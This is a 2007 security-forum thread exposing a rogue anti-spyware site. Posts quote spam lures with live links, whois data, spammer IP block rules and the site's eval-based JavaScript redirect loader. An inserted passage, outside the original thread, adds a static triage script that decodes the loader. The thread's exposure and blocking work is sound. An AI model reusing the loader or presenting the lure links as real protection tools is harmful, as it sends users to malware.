SpySlay: New Rogue?


12 replies to this topic

#1 TeMerc

Posted 20 September 2007 - 10:05 PM

I just had a user join up with a link to spyslayDOTcom/anti-spyware.

As soon as you click the page, you get re-directed to a System Doctor download!! A well-known rogue.

BAD news!

For those with SiteAdvisor reviewer status, please add your comments or mimic mine:
http://www.siteadvisor.com/sites/spyslay.com/

Google search for 'spyslay' brings up most of the forums this guy is spamming:
http://www.google.com/search?q=spyslay&...amp;rlz=1I7ADBS

From one:

Posted by: genry-morgan Sep 20 2007, 03:23 AM
hello there!
i have got a online journal. i have recieved a lot of spam in my blog recently. could anyone tell me how to get antispam filter or something else to protect my blog? spamers send there much links. spamers are bothering me !
but i should say that once i got a advantage from them. they have sent me some links to someanti virus programme. so i decided to visit this site because my PC started to work slowly. i found there a proposition to download anti virus programme. after installing it, the program deleted all spyware from my computer!!! even such progams as Kaspersky and Nod32 could not find it!!!! i could not even think that there are so many spyware in my computer!!! you could click by one of this links. searching spyware on your PC is free!!! here are the link.
hxxp://www.spyslay.com/anti-spyware/
So that guys are not so useless, i think)))


hasta la vista

This one needs to go into the rogues gallery pronto.

Admins need to add spyslayDOTcom to ban filters

I've not done any research beyond a quick Google search, just spreading the word right now.
Tom Mercado
Product Support Team Lead

#2 SwampDiner

Posted 20 September 2007 - 10:49 PM

Added to RR hosts next release

#3 TeMerc

Posted 20 September 2007 - 10:57 PM

Whois Info:

Contact: +49.3094413291

Domain Name: SPYSLAY.COM

Registrant:
TROYHORSE
Michel Dubua ()
Dionos 109
Buenos Aires
null,54652
AR
Tel. +526.54556254

Creation Date: 08-Jun-2007
Expiration Date: 08-Jun-2008

Domain servers in listed order:
ns2.spyslay.com
ns.spyslay.com

Administrative Contact:
TROYHORSE
Michel Dubua ()
Dionos 109
Buenos Aires
null,54652
AR
Tel. +526.54556254

Technical Contact:
TROYHORSE
Michel Dubua ()
Dionos 109
Buenos Aires
null,54652
AR
Tel. +526.54556254

Billing Contact:
TROYHORSE
Michel Dubua ()
Dionos 109
Buenos Aires
null,54652
AR
Tel. +526.54556254

Status:ACTIVE

Website Title: None given.
AboutUs: Wiki article on Spyslay.com
SEO Score: 61%
Terms: 62 (Unique: 47, Linked: 9)
Images: 3 (Alt tags missing: 3)
Links: 11 (Internal: 7, Outbound: 4)

Server Type: Apache/2.0.54 (Fedora)
IP Address: 87.118.103.24
IP Location - Berlin - Berlin - Keyweb Ag Ip Network
Response Code: 200
Blacklist Status: Clear
Domain Status: Registered And Active Website

ICANN Registrar: DIRECT INFORMATION PVT LTD D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2007-06-08
Expires: 2008-06-08
Registrar Status: ok
Name Server: NS.SPYSLAY.COM
Name Server: NS2.SPYSLAY.COM
Whois Server: whois.publicdomainregistry.com


Tom Mercado
Product Support Team Lead

#4 TeMerc

Posted 21 September 2007 - 12:57 AM

From here:
http://www.bluetack.co.uk/forums/index.php...amp;#entry83425

I caught this guy on two of my forums and blocked him already.

"genry-morgan" (gooffy@spyslay.com) is coming from:

61.60.74.118 - GSN, Taiwan Government Service Network.:61.60.32.0-61.60.127.255
and
210.42.140.5 - Hubei Provincial Education Commission :210.42.140.0-210.42.141.255

Both ranges look like they belong in a couple of our lists, if not there already. ;]

My forums are now blocking:
61.60.74.*
210.42.140.*
210.42.141.*


Tom Mercado
Product Support Team Lead

#5 nosirrah

Posted 21 September 2007 - 04:24 AM

http://spyslay.com/ reverse IP :

Spymurder.com :P This page is winantivirus
Bruce Harrison
Vice President of Research

#6 JeanInMontana

Posted 21 September 2007 - 03:38 PM

Seems to be offline now.

#7 nosirrah

Posted 21 September 2007 - 07:30 PM

Seems to be offline now.


Add the /anti-spyware .

It is still live .
Bruce Harrison
Vice President of Research

#8 nosirrah

Posted 21 September 2007 - 07:33 PM

You want a funny read ?

Do your best to capture the page http://spyslay.com/anti-spyware/ before it redirects .

I pasted the URL , hit enter and then stop the instant that page loads .
Bruce Harrison
Vice President of Research

#9 nosirrah

Posted 21 September 2007 - 07:36 PM

His floppies tore deaf my jeans, helplessly clubbing them off me


These generated pages are always hilarious .
Bruce Harrison
Vice President of Research

#10 JeanInMontana

Posted 22 September 2007 - 08:57 AM

It's like some cheap romance novel.

#11 MysteryFCM

Posted 04 October 2007 - 02:43 PM

You want a funny read ?

Do your best to capture the page http://spyslay.com/anti-spyware/ before it redirects .

I pasted the URL , hit enter and then stop the instant that page loads .


Just an addendum .. the re-dir is done using;

<script>
var key = "Anti-spyware"
function doLoad() {
  var req = window.XMLHttpRequest ?
    new XMLHttpRequest() :
    new ActiveXObject("Microsoft.XMLHTTP");
  req.onreadystatechange = function() {
    if (req.readyState == 4) {
      eval(req.responseText);
    }
  }
  req.open("GET", "rule.txt", true);
  req.send(null);
}
doLoad();
</script>

Which loads;

http://spyslay.com/anti-spyware/rule.txt

Which contains;

*****************************************************************
vURL Desktop Edition v0.1.6 Results
Source code for: http://spyslay.com/anti-spyware/rule.txt
Server IP: 87.118.103.24
Date: 04 October 2007
Time: 20:39:11:39
*****************************************************************
document.location="http://usarx.biz/su/in.cgi?13&parameter="+key;

Steven Burn

Malware Intelligence Analyst
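
The two-stage redirect described in the post above, as an added example that is not part of the original thread: a JavaScript (Node) static triage that flags the eval()-of-XHR-response loader, resolves the second-stage URL and reads the final redirect target without fetching or executing anything. The function names are this example's own; the embedded markup and rule.txt body are the ones quoted in the post.

```javascript
// Static triage of a two-stage "XHR + eval()" redirector; nothing is fetched or run.
// The markup and rule.txt body are the ones quoted in the thread (query separator
// written as a plain "&"); every function name here is this example's own.
const PAGE_URL = "http://spyslay.com/anti-spyware/";

const STAGE1 = `<script>
var key = "Anti-spyware"
function doLoad() {
  var req = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject("Microsoft.XMLHTTP");
  req.onreadystatechange = function() {
    if (req.readyState == 4) { eval(req.responseText); }
  }
  req.open("GET", "rule.txt", true);
  req.send(null);
}
doLoad();
</script>`;

const STAGE2 = 'document.location="http://usarx.biz/su/in.cgi?13&parameter="+key;';

// Stage 1: flag eval() of an XHR response and resolve the resource it requests.
function analyzeLoader(html, pageUrl) {
  const evalsResponse = /\beval\s*\(\s*\w+\.responseText\s*\)/.test(html);
  const open = /\.open\s*\(\s*["'](?:GET|POST)["']\s*,\s*["']([^"']+)["']/i.exec(html);
  // String variables that the second stage may append to its redirect URL.
  const vars = {};
  for (const m of html.matchAll(/\bvar\s+(\w+)\s*=\s*["']([^"']*)["']/g)) vars[m[1]] = m[2];
  return { evalsResponse, stage2Url: open ? new URL(open[1], pageUrl).href : null, vars };
}

// Stage 2: read the redirect target from the text, substituting known variables.
function extractRedirect(js, vars) {
  const m = /(?:document|window)\.location(?:\.href)?\s*=\s*["']([^"']+)["']\s*(?:\+\s*(\w+))?/.exec(js);
  if (!m) return null;
  // An unknown variable is kept as a visible <name> placeholder instead of guessed.
  const suffix = m[2] ? (vars[m[2]] ?? `<${m[2]}>`) : "";
  return { target: m[1] + suffix, host: new URL(m[1]).hostname };
}

function triage() {
  const loader = analyzeLoader(STAGE1, PAGE_URL);
  return { ...loader, redirect: extractRedirect(STAGE2, loader.vars) };
}

console.log(triage());
```

The resolved second-stage URL and the redirect host are the two values worth adding to a blocklist; the entry page alone does not reveal the second one.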


#12 MysteryFCM

Posted 05 October 2007 - 03:27 AM

Found courtesy of a spammer at the Screamer Radio forums;

spyware-protection.spyslay.com
7.5-anti-avg-plus-spyware.spyslay.com

whats up!! 
2 days ago i`ve noticed that my PC began working slowly! i decided to look for some antivirus program in network. i found realy good virus remover! here is it: 
 
[url=http://7.5-anti-avg-plus-spyware.spyslay.com/]anti spyware[/url] 
[url=http://spyware-protection.spyslay.com/]freespyware protection[/url] 
 
i think it will help you. 
chao

Posted by: callipso-ship
IP: 216.89.101.4

Steven Burn

Malware Intelligence Analyst


#13 nosirrah

Posted 05 October 2007 - 10:52 AM

http://www.google.com/search?as_q=callipso...amp;safe=images

Not as prolific as some other spammers .
Bruce Harrison
Vice President of Research
